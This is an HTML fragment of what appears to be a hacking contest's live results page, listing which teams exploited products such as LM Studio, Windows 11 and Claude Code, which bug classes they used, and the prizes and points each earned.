<p><b data-preserve-html-node="true">SUCCESS</b> - haehae (@haehaeYang) of Out Of Bounds chained 2 bugs (CWE-190, CWE-362) to exploit Chroma, earning $20,000 and 2 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png" data-image-dimensions="5712x4284" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=1000w" width="5712" height="4284" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/cc813b2e-25d8-40d3-8e89-2f039af4e6c2/IMG_4212.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f16a74a5-c8fb-471e-b443-310df16623f8/31890825-B84C-4C98-9300-2F388E0DAD82_1_105_c.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f263f440-190c-471c-aa16-9d58cacdc2dd/F1B35960-5644-4D02-A973-EC0A9BF3A342_1_105_c.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Billy (@st424204), Pan Zhenpeng (@Peterpan980927) &amp; Weiming Shi (@bestswngs) of STARLabs SG (@starlabs_sg) chained 5 bugs (incl. SSRF and Code Injection) to exploit LM Studio, earning $40,000 and 4 Master of Pwn points. Full win!</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png" data-image-dimensions="1016x888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=1000w" width="1016" height="888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ef590d46-4595-415a-8a7c-72d578c15164/Screenshot+2026-05-14+at+9.48.43%E2%80%AFAM.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Marcin Wiązowski used a heap-based buffer overflow to escalate privileges on Microsoft Windows 11 in the second round, earning $15,000 and 3 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png" data-image-dimensions="3449x2586" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=1000w" width="3449" height="2586" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ea025410-eeb1-491e-9134-3de9fbcb137e/image.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">WITHDRAWAL</b> - Qrious Secure (@qriousec) has withdrawn their entry for LM Studio in the Local Inference category.</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Chompie of IBM X-Force Offensive Research (XOR) used a race condition to escalate privileges on Red Hat Enterprise Linux for Workstations, earning $20,000 and 2 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg" data-image-dimensions="1767x1330" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=1000w" width="1767" height="1330" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6da6b79f-9492-4b34-8e36-b430bf74ffdd/Media.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3d584544-e7c2-4470-90b8-48d621467c38/chompie.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/75c13c60-75f1-42c1-82dc-77b929f3480e/chompie+2.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">COLLISON</b> - Although successful on stage, Nguyen Thanh Dat (@rewhiles) of Viettel Cyber Security (@vcslab) targeting Anthropic Claude Code in the Coding Agent category used a bug that was previously known to the vendor. They still earn $20,000 and 2 Master of Pwn points</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg" data-image-dimensions="3024x4032" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=1000w" width="3024" height="4032" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b5ea350f-9a8d-483f-b703-ea2470a01a31/Image+%281%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg" data-image-dimensions="3024x4032" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=1000w" width="3024" height="4032" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/aca34779-8d23-41c3-a957-5c95a623cfb6/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/0723c8cc-cf3c-408a-a08c-3c676e5d6706/viettel%3F.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/bb0502d8-95c7-4dda-a7a7-183401c41d13/viettel+2.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - haehae (@haehaeYang) of Out Of Bounds used a Path Traversal bug to exploit NVIDIA Megatron Bridge in the second round, earning $10,000 and 2 Master of Pwn points. Full win!</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png" data-image-dimensions="5712x4284" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=1000w" width="5712" height="4284" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a1ea5aa3-382e-4a9b-887e-56628771bd91/IMG_4217.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
